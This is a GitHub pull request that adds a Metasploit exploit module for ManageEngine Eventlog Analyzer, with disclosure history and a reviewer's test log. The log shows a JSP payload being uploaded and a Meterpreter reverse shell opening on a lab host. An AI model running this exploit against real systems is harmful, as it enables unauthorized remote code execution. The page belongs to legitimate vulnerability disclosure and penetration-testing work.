Add Eventlog Analyzer exploit #3732

Merged
merged 6 commits into from
Sep 9, 2014
pedrib (Contributor) commented Sep 1, 2014

This is yet another exploit for a ManageEngine product, Eventlog Analyzer. h0ng10 had discovered this more than a year ago, but ManageEngine failed to resolve it so he made the discovery public yesterday evening.
Long story short, I found the same bug a couple of months ago, and had an exploit ready for when ManageEngine fixed it. Since it's public now, I'm releasing the exploit. h0ng10 is credited properly as the original vulnerability discoverer.
This exploit has been very well tested in many Windows and Linux versions of the product, all the way from 7.0 to the latest 9.9 build 9002.

pedrib (Contributor Author) commented Sep 3, 2014

This final commit I've pushed is really final - I don't expect to make any more changes.

wchen-r7 self-assigned this Sep 9, 2014

wchen-r7 (Contributor) commented Sep 9, 2014

Works for me:

```
msf exploit(eventlog_file_upload) > check
[*] 192.168.1.80:8400 - The target appears to be vulnerable.
msf exploit(eventlog_file_upload) > run

[*] Started reverse handler on 192.168.1.64:4444
[*] 192.168.1.80:8400 - Determining target
[*] 192.168.1.80:8400 - Selected target Eventlog Analyzer v8.1 - v9.9 b9002 / Windows
[*] 192.168.1.80:8400 - Uploading payload...
[*] 192.168.1.80:8400 - Payload uploaded successfully
[*] 192.168.1.80:8400 - Executing payload...
[*] Sending stage (769536 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.80:1292) at 2014-09-09 11:03:35 -0500
[+] Deleted ../webapps/event/1d9Io4FqnGh3fIY.jsp
[+] Deleted ../webapps/event/MCVGhF4UjlbBBKgL8ri.jsp

meterpreter >
```

wchen-r7 merged commit ded085f into rapid7:master Sep 9, 2014
wchen-r7 added a commit that referenced this pull request Sep 9, 2014
pedrib deleted the eventlog-exploit branch October 18, 2014 10:35